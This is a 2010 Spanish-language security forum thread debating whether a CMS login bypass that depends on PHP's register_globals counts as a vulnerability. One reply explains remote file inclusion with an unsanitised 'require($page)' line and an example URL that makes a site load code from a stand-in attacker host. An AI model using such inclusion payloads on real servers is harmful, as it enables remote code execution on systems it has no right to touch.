Duda ¿se considera vulnerable?

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

5 Noviembre 2024, 09:00 am

Tema destacado: Estamos en la red social de Mastodon

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Duda ¿se considera vulnerable?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: Duda ¿se considera vulnerable? (Leído 3,630 veces)

bizco

Desconectado

Desconectado

Mensajes: 698

Ver Perfil

Duda ¿se considera vulnerable?

« en: 3 Junio 2010, 13:19 pm »

Hola, ojeando el codigo de un CMS comercial vi que puedo ver el panel de administracion y supongo que con las pruebas satisfactorias hasta el momento me puedo crear un usuario en el grupo admin y luego logearme tranquilamente (esto de momento no lo he probado, solo el listar usuarios). no necesito ser usuario logeado previamente para lograr ver el panel de administracion, el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable? ya que estando en off, no lo es (o eso creo yo).


	En línea

Shell Root

Moderador Global

Desconectado

Desconectado

Mensajes: 3.724

<3

Ver Perfil

WWW

Re: Duda ¿se considera vulnerable?

« Respuesta #1 en: 3 Junio 2010, 20:01 pm »

Lo haz hecho o no? Solo son hipótesis?


	En línea

Te vendería mi talento por poder dormir tranquilo.

bizco

Desconectado

Desconectado

Mensajes: 698

Ver Perfil

Re: Duda ¿se considera vulnerable?

« Respuesta #2 en: 3 Junio 2010, 20:15 pm »

si si, claro que esta hecho. ya esta reportado y lo estan arreglando

.

la duda era si al tener que estar register_globals en on se podria considerar vulnrable.


	En línea

Shell Root

Moderador Global

Desconectado

Desconectado

Mensajes: 3.724

<3

Ver Perfil

WWW

Re: Duda ¿se considera vulnerable?

« Respuesta #3 en: 3 Junio 2010, 20:27 pm »

Cuando las register_globals estan activadas en php.ini, puede permitir que un usuario inicialice varias variables no inicializadas anteriormente de manera remota.

Muchas veces esto es utilizado para que un usuario malévolo pueda incluir ficheros no deseados y le permite ejecutar código arbitrario desde una localización remota.

Por ejemplo:

Código

require ($page. ?.php?);

Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.

Este sería un ejemplo:

Código:

    "www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt"

Más información: :http://www.desarrolloweb.com/articulos/principales-vulnerabilidades-web.html


	En línea

Te vendería mi talento por poder dormir tranquilo.

bizco

Desconectado

Desconectado

Mensajes: 698

Ver Perfil

Re: Duda ¿se considera vulnerable?

« Respuesta #4 en: 3 Junio 2010, 21:00 pm »

si, si lo tengo claro. lo que quiero decir es si se considera vulnerable ya que no todos los servidores tienen register_globals en on, simplemente eso

.


	En línea

Shell Root

Moderador Global

Desconectado

Desconectado

Mensajes: 3.724

<3

Ver Perfil

WWW

Re: Duda ¿se considera vulnerable?

« Respuesta #5 en: 3 Junio 2010, 21:03 pm »

Leiste bien?

Cita de: shellroot@alex-laptop:~$ en 3 Junio 2010, 20:27 pm

Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.


	En línea

Te vendería mi talento por poder dormir tranquilo.

bizco

Desconectado

Desconectado

Mensajes: 698

Ver Perfil

Re: Duda ¿se considera vulnerable?

« Respuesta #6 en: 3 Junio 2010, 21:21 pm »

me leiste bien tu al principio?

Citar

el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable?

en ningun momento pregunte que hace register_globals. sabia que poniendolo en on, podia saltarme el formulario de login, pero no sabia si se considera vulnerable al depender de register_globals.


	En línea

tragantras

Desconectado

Desconectado

Mensajes: 465

Ver Perfil

Re: Duda ¿se considera vulnerable?

« Respuesta #7 en: 3 Junio 2010, 21:42 pm »

jaja vaya discusión...

yo pienso que como vulnerabilidad se podría considerar... pero dudo mucho que algun servidor comercial tenga el registr_globals a on :/ ya que no es opcion por defecto y no se me ocurre ningun beneficio de ello (aparte de ahorrarse los $_GET y esas cosas xD )


	En línea

Colaboraciones:
1 2

bizco

Desconectado

Desconectado

Mensajes: 698

Ver Perfil

Re: Duda ¿se considera vulnerable?

« Respuesta #8 en: 3 Junio 2010, 22:14 pm »

por eso mismo tenia mis dudas, pero vamos que hay mas server de los que parecen con esta opcion activada.


	En línea

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		Snowden se considera un soplón pero con muy buenas intenciones Noticias	almafuerte25	0	1,446	19 Octubre 2013, 14:19 pm por almafuerte25
		Duda - Simular entorno vulnerable Seguridad	MetaNoia	4	3,008	17 Diciembre 2019, 23:33 pm por @XSStringManolo
		El antiguo y conocido servicio rexec vulnerable (duda) Hacking	retr02332	0	3,386	24 Agosto 2020, 01:37 am por retr02332

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines